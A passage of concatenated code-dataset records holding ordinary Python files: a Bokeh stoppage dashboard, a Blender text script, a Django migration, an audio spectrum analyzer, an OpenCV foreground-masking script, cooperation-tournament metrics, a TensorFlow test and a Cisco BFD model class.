[(\"Machine\",\"@Machine\"),(\"Status\",\"@Status\"),(\"Date\",\"@Start_Time{%F}\"),(\"Stoppage Change Count\",\"@Count\"),(\"Duration of Stoppage\",\"@duration_sec{1.111} seconds\")] ## define the content of the hover tooltip\n \n hover.formatters = { \"@Start_Time\": \"datetime\"}\n p.add_tools(hover)\n \n p.xaxis.axis_label = \"Date\"\n p.yaxis.axis_label = \"Stoppage Duration in seconds\"\n p.xaxis.major_label_orientation = 3.4142/4\n \n p.xaxis.ticker = DaysTicker(days=list(range(min(df.Start_Time.dt.day),max(df.Start_Time.dt.day)+1)))\n \n p.xgrid.visible = False\n return p \n \n def make_lineplotmod(data):\n p = figure(plot_width=800, plot_height=400, x_axis_type=\"datetime\") \n for status in statuses:\n d = data.loc[data['Status']==status]\n source = ColumnDataSource(d)\n p.line(x=\"Start_Time\", y=\"duration_sec\", line_width=2, source=source, color=color_dict.get(status), legend_label = status)\n \n #d['Start_Time'] = pd.to_datetime(d['Start_Time']).dt.to_period('D')\n \n p.legend.location = \"top_left\"\n p.legend.click_policy=\"hide\"\n \n hover = HoverTool()\n hover.tooltips = [(\"Machine\",\"@Machine\"),(\"Status\",\"@Status\"),(\"Date\",\"@Start_Time{%F}\"),(\"Stoppage Change Count\",\"@Count\"),(\"Duration of Stoppage\",\"@duration_sec{1.111} seconds\")] ## define the content of the hover tooltip\n \n hover.formatters = { \"@Start_Time\": \"datetime\"}\n p.add_tools(hover)\n \n p.xaxis.axis_label = \"Date\"\n p.yaxis.axis_label = \"Stoppage Duration in seconds\"\n p.xaxis.major_label_orientation = 3.4142/4\n \n p.xaxis.ticker = DaysTicker(days=list(range(min(df.Start_Time.dt.day),max(df.Start_Time.dt.day)+1)))\n \n p.xgrid.visible = False\n 
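        # NOTE: the DaysTicker above spans day-of-month values from the data's\n        # minimum to its maximum day, which implicitly assumes every sample falls\n        # within a single calendar month; data crossing a month boundary would\n        # need a different ticker (e.g. a plain DatetimeTicker).\n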
return p \n ################################################################################################\n \n #make table 1\n def make_table(source):\n datefmt = DateFormatter(format=\"%a, %d %b %Y\")\n columns = [TableColumn(field=\"Start_Time\", title=\"Date\", formatter = datefmt),TableColumn(field=\"Status\", title=\"Status\"), TableColumn(field=\"Count\", title=\"Freq\"), TableColumn(field=\"duration_sec\", title=\"Duration(s)\")] \n data_table = DataTable(source=source, columns=columns, width=400, height=200, fit_columns=True)\n return data_table\n \n def maketablesource(data):\n new_start= datetime.datetime.utcfromtimestamp(date_range_slider.value[0]/1000)\n new_end = datetime.datetime.utcfromtimestamp(date_range_slider.value[1]/1000)\n status_to_use = [status_selection.labels[i] for i in status_selection.active]\n data1 = data.loc[(pd.PeriodIndex(data['Start_Time'], freq='D').to_timestamp() >= new_start) & (pd.PeriodIndex(data['Start_Time'], freq='D').to_timestamp() <= new_end)]\n data1 = data1.loc[data1.Status.isin(status_to_use)]\n return ColumnDataSource(data1)\n \n \n ################################################################################################\n \n #update filters\n def update(attr, old, new):\n new_start= datetime.datetime.utcfromtimestamp(date_range_slider.value[0]/1000)\n new_end = datetime.datetime.utcfromtimestamp(date_range_slider.value[1]/1000)\n \n \n #line\n #global linedf\n #linedf = preparelinedata(df_subset)\n data = linedf.loc[(pd.PeriodIndex(linedf['Start_Time'], freq='D').to_timestamp() >= new_start) & (pd.PeriodIndex(linedf['Start_Time'], freq='D').to_timestamp() <= new_end)]\n line_plot = make_lineplotmod(data)\n \n #table 1\n table_src = maketablesource(df_subset)\n data_table1 = make_table(table_src)\n \n #the layout\n rt = column(status_selection, date_range_slider)\n ly = layout([[radio_group],[line_plot],[rt,data_table1]])\n col = column(children=[ly], name='main_column')\n # curdoc().remove_root(curdoc().roots[1])\n curdoc().add_root(col)\n \n \n ################################################################################################\n \n #radio button on update change document content\n def updatedf(new):\n global df_subset\n #values for df\n df_subset = df[df.Machine == machines[new]]\n \n #for check box\n global statuses\n statuses = df_subset['Status'].unique()\n available_statuses = list(statuses)\n global status_selection\n status_selection = CheckboxGroup(labels=available_statuses, active = list(range(len(available_statuses))))\n status_selection.on_change(\"active\", update)\n \n #date range slider\n global date_range_slider\n new_start= datetime.datetime.utcfromtimestamp(date_range_slider.value[0]/1000)\n new_end = datetime.datetime.utcfromtimestamp(date_range_slider.value[1]/1000)\n date_range_slider = DateRangeSlider(value=(new_start, new_end),start=mi_dt, end=mx_dt, step=1*24*60*60*1000)\n date_range_slider.on_change(\"value\", update)\n \n #lineplot\n global linedf\n linedf = preparelinedata(df_subset)\n data = linedf.loc[(pd.PeriodIndex(linedf['Start_Time'], freq='D').to_timestamp() >= new_start) & (pd.PeriodIndex(linedf['Start_Time'], freq='D').to_timestamp() <= new_end)]\n line_plot = make_lineplot(data)\n \n #table 1\n table_src = maketablesource(df_subset)\n data_table1 = make_table(table_src)\n \n #the layout\n rt = column(status_selection, date_range_slider)\n ly = layout([[radio_group],[line_plot],[rt,data_table1]])\n #curdoc().remove_root(curdoc().roots[1])\n col = column(children=[ly], 
name='main_column')\n curdoc().add_root(col)\n \n ##################################################################################################\n \n #radio button\n radio_group = RadioGroup(labels=list(machines), active=0, inline=True)\n radio_group.on_click(updatedf)\n \n #initial values\n df_subset = df[df.Machine == machines[0]]\n linedf = preparelinedata(df_subset)\n \n ## check box for machine status\n statuses = df_subset['Status'].unique()\n available_statuses = list(statuses)\n status_selection = CheckboxGroup(labels=available_statuses, active = list(range(len(available_statuses))))\n status_selection.on_change(\"active\", update)\n \n #date slider\n date_range_slider = DateRangeSlider(value=(mi_dt, mx_dt),start=mi_dt, end=mx_dt, step=1*24*60*60*1000)\n date_range_slider.on_change(\"value\", update)\n \n #lineplot\n line_plot = make_lineplot(linedf)\n \n #table 1\n table_src = maketablesource(df_subset)\n data_table1 = make_table(table_src)\n \n rt = column(status_selection, date_range_slider)\n ly = layout([[radio_group],[line_plot],[rt,data_table1]])\n \n col = column(children=[ly], name='main_column')\n curdoc().add_root(col)\n \n return Panel(child = ly, title = \"Machines\" )\n\ndef getoveralldetails(df):\n \n m=df.groupby(['Filler_Status','Machine','Status']).sum().reset_index()\n m['duration_sec'] = round(m['duration_sec'],3)\n \n def const_d_table(data, machine):\n data = data.loc[data.Status != \"Running\"]\n max_value_index = data.index[data['duration_sec']==data['duration_sec'].max()]\n sts = data['Status'][max_value_index]\n source = ColumnDataSource(data)\n template=\"\"\" \n
;\"> \n <%= value %>\n
\n        \"\"\"\n        formatter = HTMLTemplateFormatter(template=template)\n        columns = [TableColumn(field=\"Status\", title=\"Status\", formatter=formatter), TableColumn(field=\"Count\", title=\"Freq\", formatter=formatter), TableColumn(field=\"duration_sec\", title=\"Duration(s)\", formatter=formatter)] \n        data_table = DataTable(source=source, columns=columns, width=275, height=200, fit_columns=True)\n        div = Div(text=\"\"\"<b>\"\"\"+machine+\"\"\" Details</b>\"\"\")\n        return (column(div, data_table))\n\n    machines = df.Machine.unique()\n    table_list = []\n    for machine in machines:\n        ndf = m.loc[m.Machine == machine]\n        table_list.append(const_d_table(ndf,machine))\n    \n    grid = gridplot(table_list, ncols=3)\n    div = Div(text=\"\"\"<b>Overall Details</b>\"\"\",style={'font-size': '200%', 'color': 'blue'})\n    g = column(div, grid)\n    \n    return Panel(child = g, title=\"Overall Details\")\n","sub_path":"Figures/dash_subtabs.py","file_name":"dash_subtabs.py","file_ext":"py","file_size_in_byte":11180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"475220592","text":"\nimport bpy\n\ndef removeObjects( scn ):\n    for ob in scn.objects:\n        if (ob.type == 'FONT') or (ob.type == 'MESH'):\n            scn.objects.unlink( ob )\n    \nscn = bpy.context.scene\nremoveObjects( scn )\n\nfnt = bpy.data.fonts.load('C:\\\\Windows\\\\Fonts\\\\Impact.ttf')\n\ndef makeMaterial(name, diffuse, specular, alpha):\n    mat = bpy.data.materials.new(name)\n    mat.diffuse_color = diffuse\n    mat.diffuse_shader = 'LAMBERT'\n    mat.diffuse_intensity = 1.0\n    mat.specular_color = specular\n    mat.specular_shader = 'COOKTORR'\n    mat.specular_intensity = 0.5\n    mat.alpha = alpha\n    mat.ambient = 1\n    return mat\n\ndef setMaterial(ob, mat):\n    me = ob.data\n    me.materials.append(mat)\n    \nred = makeMaterial('Red', (1, 0, 0), (1, 1, 1), 1)\nblue = makeMaterial('BlueSemi', (0, 0, 1), (1, 1, 1), 0.5)\ngreen = makeMaterial('GreenSemi', (0, 1, 0), (1, 1, 1), 0.5)\nyellow = makeMaterial('YellowSemi', (1, 1, 0), (1, 1, 1), 0.5)\n\n# Create and name TextCurve object #1\nbpy.ops.object.text_add(\nlocation=(0, 4, 0),\nrotation=(0,0,0))\nob = bpy.context.object\nob.name = 'Text1'\n# TextCurve attributes\nob.data.name = 'TextData1'\nob.data.body = \"Line 1\"\nob.data.font = fnt\nob.data.size = 3\n# Inherited Curve attributes\nob.data.extrude = 0.2\nsetMaterial(ob, red)\n\nbpy.ops.object.convert(target='MESH', keep_original=False)\n\n# Create and name TextCurve object #2\nbpy.ops.object.text_add(\nlocation=(0, 2, 0),\nrotation=(0,0,0))\nob = bpy.context.object\nob.name = 'Text2'\n# TextCurve attributes\nob.data.name = 'TextData2'\nob.data.body = \"Line 2\"\nob.data.font = fnt\nob.data.size = 3\n# Inherited Curve attributes\nob.data.extrude = 0.2\nsetMaterial(ob, green)\n\nbpy.ops.object.convert(target='MESH', keep_original=False)\n\n# Create and name TextCurve object #3\nbpy.ops.object.text_add(\nlocation=(0, 0.1, 0),\nrotation=(0,0,0))\nob = bpy.context.object\nob.name = 'Text3'\n# TextCurve attributes\nob.data.body = \"Line 3\"\nob.data.name = 'TextData3'\nob.data.font = fnt\nob.data.size = 3\n# Inherited Curve attributes\nob.data.extrude = 0.2\nsetMaterial(ob, yellow)\n\nbpy.ops.object.convert(target='MESH', keep_original=False)\n\n\nbpy.ops.object.mode_set(mode='EDIT')\nbpy.ops.uv.smart_project()\nbpy.ops.object.mode_set(mode='OBJECT')\n
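\n# NOTE: mode_set('EDIT') and uv.smart_project() above act on the active object\n# only, i.e. the last text converted ('Text3'); a sketch that unwraps all three\n# converted meshes would loop and activate each in turn, e.g.:\n#     for mesh_ob in [o for o in scn.objects if o.type == 'MESH']:\n#         scn.objects.active = mesh_ob\n#         bpy.ops.object.mode_set(mode='EDIT')\n#         bpy.ops.uv.smart_project()\n#         bpy.ops.object.mode_set(mode='OBJECT')\n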
\n","sub_path":"anims/text/text-multiline-01.py","file_name":"text-multiline-01.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"575152957","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('accounts', '0025_auto_20150809_1723'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='account',\n name='custom_conv',\n field=models.TextField(null=True, verbose_name=b'\\xe4\\xb8\\x8e\\xe6\\x9c\\x8d\\xe5\\x8a\\xa1\\xe5\\x99\\xa8\\xe7\\x9a\\x84\\xe7\\xa7\\x81\\xe8\\x81\\x8aid', blank=True),\n ),\n ]\n","sub_path":"accounts/migrations/0026_auto_20150810_1103.py","file_name":"0026_auto_20150810_1103.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"367819208","text":"#!/usr/bin/env python\n# -*- charset utf8 -*-\n\nimport pyaudio\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\nimport matplotlib.animation\n\nRATE = 44100\nBUFFER = 882\n\np = pyaudio.PyAudio()\n\nstream = p.open(\n format = pyaudio.paFloat32,\n channels = 1,\n rate = RATE,\n input = True,\n output = False,\n frames_per_buffer = BUFFER\n)\n\nfig = plt.figure()\nline1 = plt.plot([],[])[0]\nline2 = plt.plot([],[])[0]\n\nr = range(0,int(RATE/2+1),int(RATE/BUFFER))\nl = len(r)\n\ndef init_line():\n line1.set_data(r, [-1000]*l)\n line2.set_data(r, [-1000]*l)\n return (line1,line2,)\n\ndef update_line(i):\n try:\n data = np.fft.rfft(np.frombuffer(\n stream.read(BUFFER), dtype=np.float32)\n )\n except IOError:\n pass\n data = np.log10(np.sqrt(\n np.real(data)**2+np.imag(data)**2) / BUFFER) * 10\n line1.set_data(r, data)\n line2.set_data(np.maximum(line1.get_data(), line2.get_data()))\n return (line1,line2,)\n\nplt.xlim(0, RATE/2+1)\nplt.ylim(-60, 0)\nplt.xlabel('Frequency')\nplt.ylabel('dB')\nplt.title('Spectrometer')\nplt.grid()\n\nline_ani = matplotlib.animation.FuncAnimation(\n fig, update_line, init_func=init_line, interval=0, blit=True\n)\n\nplt.show()\n","sub_path":"s2l_01_spectrum_analyzer.py","file_name":"s2l_01_spectrum_analyzer.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"560287779","text":"import cv2\nimport numpy as np\nimport imutils\nimport time\nfrom skimage import measure\nfrom skimage import filters\nimport matplotlib.pyplot as plt\n\ncap = cv2.VideoCapture(\"data/0001_L.mp4\")\nfwidth = cap.get(cv2.CAP_PROP_FRAME_WIDTH)\nfheight = cap.get(cv2.CAP_PROP_FRAME_HEIGHT)\n\nbg = cv2.imread(\"data/side-view.jpg\", cv2.IMREAD_COLOR)\n\ndef inPolygon(x, y, xp, yp):\n c = 0\n for i in range(len(xp)):\n if (((yp[i] <= y and y < yp[i-1]) or (yp[i-1] <= y and y < yp[i])) and\n (x > (xp[i-1] - xp[i]) * (y - yp[i]) / (yp[i-1] - yp[i]) + xp[i])):\n c = 1 - c\n if c == 1:\n return True\n return False\n\ndef tresh(pixel):\n if pixel[0] < 40 and pixel[1] < 40 and pixel[2] < 40:\n return False\n return True\n\ndef masking(img, bg, polyX, polyY, offset_v=0, offset_h=0):\n n_rows = img.shape[0]\n n_cols = img.shape[1]\n bg_hsv = cv2.cvtColor(bg, cv2.COLOR_BGR2HSV)\n m = np.zeros([n_rows, n_cols], dtype=np.int)\n # obj_x = []\n # obj_y = []\n\n for i in range(offset_v - 1, n_rows - 1):\n for j in range(offset_h - 1, n_cols - 1):\n bg_hue = int(bg_hsv[i, j, 0])\n\n if not 
on_field_background(bg_hue) or not inPolygon(j, i, polyX, polyY) or not tresh(img[i, j]):\n continue\n\n m[i, j] = 1\n # obj_x.append(i)\n # obj_y.append(j)\n\n return m #, np.array(obj_x, dtype=np.int), np.array(obj_y, dtype=np.int)\n\ndef mask_background(img, mask, mask_color=(0, 0, 0)):\n result = np.array(img, copy=True)\n result[mask == 0] = mask_color\n result[mask == 1] = (255, 255, 255)\n return result\n\ndef on_field_background(hue):\n if hue in range(35, 45):\n return True\n return False\n\ndef feature_vector(img, obj_x, obj_y, x_max, y_max, increment=1):\n n_features = 3\n result = np.zeros([1, n_features])\n result_norm = np.zeros([1, n_features])\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n n_points = obj_x.size\n for i in range(0, n_points, increment):\n x = obj_x[i]\n y = obj_y[i]\n hue = hsv[x, y, 0]\n # sat = hsv[x, y, 1]\n\n fv = np.array([x, y, hue])\n result = np.vstack((result, fv))\n\n # Normalize the values\n\n x = x / (x_max - 1)\n y = y / (y_max - 1)\n hue = hue / 179.\n # sat = sat / 255.\n\n fv = np.array([x, y, hue])\n result_norm = np.vstack((result_norm, fv))\n\n result_norm = np.delete(result_norm, 0, 0)\n result = np.delete(result, 0, 0)\n return result_norm, result\n\n# for i in range(500):\n# __, f = cap.read()\n\nwhile(1):\n ret, f = cap.read()\n if ret is False:\n break\n\n diff = cv2.absdiff(f, bg)\n\n x = (295, 640, 640, 0)\n y = (95, 115, 380, 250)\n\n obj_mask = masking(diff, bg, x, y)\n fg = mask_background(diff, obj_mask)\n\n # n = 2\n # l = 10\n #\n # im = filters.gaussian(fg, sigma=l / (4. * n), multichannel=False)\n # blobs = im > 0.7 * im.mean()\n # labels = measure.label(fg, neighbors=8, background=0)\n #\n # for label in np.unique(labels):\n # if label == 0:\n # continue\n #\n # labelMask = np.zeros(fg.shape, dtype=\"uint8\")\n # labelMask[labels == label] = 255\n # fg = cv2.add(fg, labelMask)\n\n\n cv2.imshow('absdiff', fg)\n\n # start_time = time.time()\n # fvs, fvs_raw = feature_vector(fg, obj_x, obj_y, x_max=fheight, y_max=fwidth, increment=4)\n # print(\"Feature vectors %s (%ds)\" % (str(fvs.shape), (time.time() - start_time)))\n # np.savetxt(\"foreground.txt\", fvs, '%5.8f')\n # np.savetxt(\"foreground_unnormalized.txt\", fvs_raw, '%5.0f')\n # exit()\n\n k = cv2.waitKey(30) & 0xff\n if k == 27:\n break\n\n\ncap.release()\ncv2.destroyAllWindows()","sub_path":"test_diff.py","file_name":"test_diff.py","file_ext":"py","file_size_in_byte":3716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"417598847","text":"import numpy as np\nfrom sklearn import metrics\nimport matplotlib.pyplot as plt\nfrom run_tournament import *\nimport statistics as st\n\n\ndef mean_std(values, rd = 3):\n m = st.mean(values)\n std = st.stdev(values)\n return (np.round(m, rd) , np.round(std, rd))\n\ndef efficiency(payoffs_agents, payoffs_nices, payoffs_defectors):\n n_agents = len(payoffs_agents)\n t_max = len(payoffs_agents[0])\n social_welfare = [sum([payoffs_agents[i][t] for i in range(n_agents)]) for t in range(t_max)]\n social_welfare_opt = [sum([payoffs_nices[i][t] for i in range(n_agents)]) for t in range(t_max)]\n social_welfare_worse = [sum([payoffs_defectors[i][t] for i in range(n_agents)]) for t in range(t_max)]\n efficiency_output = [(social_welfare[t]-social_welfare_worse[0])/(social_welfare_opt[0]-social_welfare_worse[0]) for t in range(t_max)]\n return np.round(efficiency_output[-1],3), efficiency_output\n\n\ndef speed(efficiency_list, delta_T=20):\n delta_T = min(len(efficiency_list), delta_T)\n 
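    # speed = area under the efficiency curve over the first delta_T steps,\n    # normalized by delta_T * final_efficiency, so a value near 1 means the\n    # final efficiency level was reached almost immediately.\n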
print(delta_T)\n final_efficiency = efficiency_list[-1]\n print(final_efficiency)\n x = np.arange(delta_T)\n if final_efficiency == 0:\n output = 0.0\n else:\n output = metrics.auc(x, efficiency_list[:delta_T])/(delta_T*final_efficiency)\n return np.round(output, 3)\n\n\ndef incentive_compatibility(curve_payoffs_1nice, curve_payoffs_1egoist, payoffs_nices, payoffs_egoists):\n output = sum(curve_payoffs_1nice) - sum(curve_payoffs_1egoist)\n output /= sum(payoffs_nices) - sum(payoffs_egoists)\n return np.clip(np.round(output, 3), 0, 1)\n\n\ndef safety(curve_payoffs_1Agent_allDef, curve_payoffs_egoists, curve_payoffs_1Nice_allDef):\n output = sum(curve_payoffs_1Agent_allDef) - sum(curve_payoffs_egoists)\n output /= sum(curve_payoffs_egoists) - sum(curve_payoffs_1Nice_allDef)\n return np.round(output, 3)\n\n\ndef forgiveness_old(all_agents_payoffs, lateNice_vs_agents_payoffs, t_max=100, tau1 = 50, delta_T = 20):\n v_late_nice_0 = lateNice_vs_agents_payoffs[tau1+1]\n v_optimal_final = all_agents_payoffs[-1]\n delta_T = min(delta_T, (t_max-tau1-1))\n cst_norm = delta_T*(v_optimal_final-v_late_nice_0)\n x = np.arange(delta_T)\n output = metrics.auc(x, lateNice_vs_agents_payoffs[tau1+1:tau1+1+delta_T])\n output -= v_late_nice_0*(delta_T-1)\n output /= cst_norm\n if abs(v_optimal_final-v_late_nice_0) < 1e-3:\n return 1.0\n else:\n return np.clip(np.round(output, 3), 0, 1)\n\n\ndef forgiveness(lateNice_vs_agents_payoffs, payoffs_nices, payoffs_defectors, tau1 = 20):\n\n n_agents = len(lateNice_vs_agents_payoffs)\n t_max = len(lateNice_vs_agents_payoffs[0])\n social_welfare = [sum([lateNice_vs_agents_payoffs[i][t] for i in range(n_agents)]) for t in range(tau1, t_max)]\n social_welfare_opt = [sum([payoffs_nices[i][t] for i in range(n_agents)]) for t in range(tau1, t_max)]\n social_welfare_worse = [sum([payoffs_defectors[i][t] for i in range(n_agents)]) for t in range(tau1, t_max)]\n output = [(social_welfare[t] - social_welfare_worse[0]) / (social_welfare_opt[0] - social_welfare_worse[0]) for t in range(t_max- tau1)]\n\n return np.round(np.mean(output),3)\n\n\n\ndef reset_agents(list_of_agents):\n for a in list_of_agents:\n a.reset()\n\ndef compute_metrics(tournament, list_of_nA_agents, t_max, delta_T = 20, tau1=50, metrics_fig='output_metrics.png', repentant_behavior=False):\n\n n_agents = tournament.n_agents\n coop_max_matrix = tournament.max_coop\n\n assert len(list_of_nA_agents) >= n_agents\n\n t_coop_LN = tau1\n\n # LIST of n_agents instances of the Agent we want to study\n list_all_agents = list_of_nA_agents\n\n # LIST of: One Late Nice + (n_agents-1) instances of the Agent\n list_agents_LN = [Agent_LateNice(0, 'LateNice', n_agents=n_agents, max_coop_matrix=coop_max_matrix,\n t_coop=t_coop_LN)] + list_all_agents[1:]\n\n # LIST of: One instance of a Nice agent (Cooperator) + (n_agents-1) instances of the Agent\n list_agents_1Coop = [Agent_Nice(0, 'Nice', n_agents=n_agents, max_coop_matrix=coop_max_matrix)] + list_all_agents[1:]\n\n # LIST of: One instance of a Egoist agent (Defector) + (n_agents-1) instances of the Agent\n list_agents_1Def = [Agent_Egoist(0, 'Egoist', n_agents=n_agents, max_coop_matrix=coop_max_matrix)] + list_all_agents[1:]\n\n # LIST of: One instance of n_agents Nice agents\n list_all_Nices = [Agent_Optimal(i, 'Opt', n_agents=n_agents, max_coop_matrix=coop_max_matrix, optimal_subgraph = tournament.optimal_graph) for i in range(n_agents)]\n\n # LIST of: One instance of n_agents Egoist agents\n list_all_Defectors = [Agent_Egoist(i, 'E', n_agents=n_agents, 
max_coop_matrix=coop_max_matrix) for i in range(n_agents)]\n\n # LIST of: One instance of a the Agent + (n_agents-1) Egoist agents\n list_1Agent_all_Def = [list_all_agents[0]] + [Agent_Egoist(i+1, 'E', n_agents=n_agents, max_coop_matrix=coop_max_matrix) for i in range(n_agents-1)]\n\n # LIST of: One Nice Agent + (n_agents-1) Egoist agents\n list_1Nice_all_Def = [Agent_Nice(0, 'N', n_agents=n_agents, max_coop_matrix=coop_max_matrix)] + [\n Agent_Egoist(i + 1, 'E', n_agents=n_agents, max_coop_matrix=coop_max_matrix) for i in range(n_agents - 1)]\n\n\n\n # RUNNING Tournaments with different lists of Agents to compute metrics\n N_runs = 8\n k = 1\n\n tournament.reset()\n reset_agents(list_agents_LN)\n print()\n print(\"#### RUN EVAL TOURNAMENT \"+str(k)+'/'+str(N_runs))\n k += 1\n payoffs_agents_LateNice = run_tournament(tournament=tournament, list_agents=list_agents_LN, n_steps=t_max, render=False, name_expe='late-test', print_steps=False)\n\n tournament.reset()\n reset_agents(list_all_agents)\n print()\n print(\"#### RUN EVAL TOURNAMENT \"+str(k)+'/'+str(N_runs))\n k += 1\n payoffs_agents = run_tournament(tournament=tournament, list_agents=list_all_agents, n_steps=t_max, render=False, name_expe=\"test_all_TFT\", print_steps=False)\n\n tournament.reset()\n reset_agents(list_all_Nices)\n print()\n print(\"#### RUN EVAL TOURNAMENT \"+str(k)+'/'+str(N_runs))\n k += 1\n payoffs_nices = run_tournament(tournament=tournament, list_agents=list_all_Nices, n_steps=t_max, render=False, print_steps=False)\n\n tournament.reset()\n reset_agents(list_all_Defectors)\n print()\n print(\"#### RUN EVAL TOURNAMENT \"+str(k)+'/'+str(N_runs))\n k += 1\n payoffs_defectors = run_tournament(tournament=tournament, list_agents=list_all_Defectors, n_steps=t_max, render=False, print_steps=False)\n\n tournament.reset()\n reset_agents(list_agents_1Def)\n print()\n print(\"#### RUN EVAL TOURNAMENT \"+str(k)+'/'+str(N_runs))\n k += 1\n payoffs_agents_1Egoist = run_tournament(tournament=tournament, list_agents=list_agents_1Def, n_steps=t_max, render=False, print_steps=False)\n\n tournament.reset()\n reset_agents(list_agents_1Coop)\n print()\n print(\"#### RUN EVAL TOURNAMENT \"+str(k)+'/'+str(N_runs))\n k += 1\n payoffs_agents_1Nice = run_tournament(tournament=tournament, list_agents=list_agents_1Coop, n_steps=t_max, render=False, print_steps=False)\n\n tournament.reset()\n reset_agents(list_1Agent_all_Def)\n print()\n print(\"#### RUN EVAL TOURNAMENT \"+str(k)+'/'+str(N_runs))\n k += 1\n payoffs_agents_1Agent_all_Def = run_tournament(tournament=tournament, list_agents=list_1Agent_all_Def, n_steps=t_max, render=False, print_steps=False)\n\n tournament.reset()\n reset_agents(list_1Nice_all_Def)\n print()\n print(\"#### RUN EVAL TOURNAMENT \"+str(k)+'/'+str(N_runs))\n k += 1\n payoffs_agents_1Nice_all_Def = run_tournament(tournament=tournament, list_agents=list_1Nice_all_Def, n_steps=t_max, render=False, print_steps=False)\n\n\n curve_payoffs_LN = payoffs_agents_LateNice[0]\n curve_payoffs_agents = payoffs_agents[0]\n curve_payoffs_nices = payoffs_nices[0]\n curve_payoffs_1egoist = payoffs_agents_1Egoist[0]\n curve_payoffs_1nice = payoffs_agents_1Nice[0]\n curve_payoffs_egoists = payoffs_defectors[0]\n curve_payoffs_1Agent_allDef = payoffs_agents_1Agent_all_Def[0]\n curve_payoffs_1Nice_allDef = payoffs_agents_1Nice_all_Def[0]\n\n\n plt.plot(curve_payoffs_LN, label='Repentant defector', color = 'purple')\n plt.plot(curve_payoffs_agents, label='Agent vs (N-1) agents', color = 'orange')\n plt.plot(curve_payoffs_nices, 
label='Optimal - all cooperators', color = 'green')\n\n plt.plot(curve_payoffs_egoists, label='Worst - all defectors', color = 'brown')\n #plt.plot(curve_payoffs_1Agent_allDef, label='Agent vs all defectors', color = 'orange')\n #plt.plot(curve_payoffs_1Nice_allDef, label='Cooperator vs all defectors', color = 'green')\n plt.plot(curve_payoffs_1nice, label='Nice vs (N-1) agents', color='pink')\n plt.plot(curve_payoffs_1egoist, label = 'Egoist vs (N-1) agents', color = 'red')\n\n plt.legend(loc=0)\n plt.xlabel('steps')\n plt.ylabel('payoff')\n plt.savefig(metrics_fig)\n plt.clf()\n\n ef, evo_efficiency = efficiency(payoffs_agents, payoffs_nices, payoffs_defectors)\n sp = speed(evo_efficiency, delta_T=delta_T)\n ic = incentive_compatibility(curve_payoffs_1nice, curve_payoffs_1egoist, curve_payoffs_nices, curve_payoffs_egoists)\n sf = safety(curve_payoffs_1Agent_allDef, curve_payoffs_egoists, curve_payoffs_1Nice_allDef)\n #fg = forgiveness(payoffs_agents[0], payoffs_agents_LateNice[0], t_max=t_max, tau1=tau1, delta_T=delta_T)\n fg = forgiveness(payoffs_agents_LateNice, payoffs_nices, payoffs_defectors, tau1=t_coop_LN)\n\n\n print()\n print(\"Efficiency = \", ef)\n print(\"Speed = \", sp)\n print(\"IC = \", ic)\n print(\"Safety = \", sf)\n print(\"Forgiveness = \", fg)\n\n return [ef, sp, fg, ic, sf]\n\n","sub_path":"social_metrics.py","file_name":"social_metrics.py","file_ext":"py","file_size_in_byte":9665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"377257565","text":"import unittest\n\nimport tensorflow as tf\n\nclass TestTensorflow(unittest.TestCase):\n def test_addition(self): \n op = tf.add(2, 3) \n sess = tf.Session()\n\n result = sess.run(op)\n\n self.assertEqual(5, result)\n","sub_path":"tests/test_tensorflow.py","file_name":"test_tensorflow.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"241031641","text":"# coding=UTF-8\n# **********************************************************************\n# Copyright (c) 2013-2020 Cisco Systems, Inc. 
All rights reserved\n# written by zen warriors, do not modify!\n# **********************************************************************\n\n\nfrom cobra.mit.meta import ClassMeta\nfrom cobra.mit.meta import StatsClassMeta\nfrom cobra.mit.meta import CounterMeta\nfrom cobra.mit.meta import PropMeta\nfrom cobra.mit.meta import Category\nfrom cobra.mit.meta import SourceRelationMeta\nfrom cobra.mit.meta import NamedSourceRelationMeta\nfrom cobra.mit.meta import TargetRelationMeta\nfrom cobra.mit.meta import DeploymentPathMeta, DeploymentCategory\nfrom cobra.model.category import MoCategory, PropCategory, CounterCategory\nfrom cobra.mit.mo import Mo\n\n\n# ##################################################\nclass Sess(Mo):\n \"\"\"\n This object holds bfd session information \n\n \"\"\"\n\n meta = ClassMeta(\"cobra.model.bfd.Sess\")\n\n meta.moClassName = \"bfdSess\"\n meta.rnFormat = \"session-%(discr)s\"\n meta.category = MoCategory.REGULAR\n meta.label = \"BFD Session\"\n meta.writeAccessMask = 0x8008020040001\n meta.readAccessMask = 0x8008020040001\n meta.isDomainable = False\n meta.isReadOnly = True\n meta.isConfigurable = False\n meta.isDeletable = False\n meta.isContextRoot = False\n\n meta.childClasses.add(\"cobra.model.fault.Counts\")\n meta.childClasses.add(\"cobra.model.health.Inst\")\n meta.childClasses.add(\"cobra.model.fault.Inst\")\n meta.childClasses.add(\"cobra.model.bfd.SessStats\")\n meta.childClasses.add(\"cobra.model.bfd.RtMbrSess\")\n meta.childClasses.add(\"cobra.model.bfd.PeerV\")\n meta.childClasses.add(\"cobra.model.bfd.SessApp\")\n meta.childClasses.add(\"cobra.model.bfd.RsMbrSess\")\n\n meta.childNamesAndRnPrefix.append((\"cobra.model.bfd.RsMbrSess\", \"rsmbrSess-\"))\n meta.childNamesAndRnPrefix.append((\"cobra.model.bfd.RtMbrSess\", \"rtmbrSess\"))\n meta.childNamesAndRnPrefix.append((\"cobra.model.fault.Counts\", \"fltCnts\"))\n meta.childNamesAndRnPrefix.append((\"cobra.model.health.Inst\", \"health\"))\n 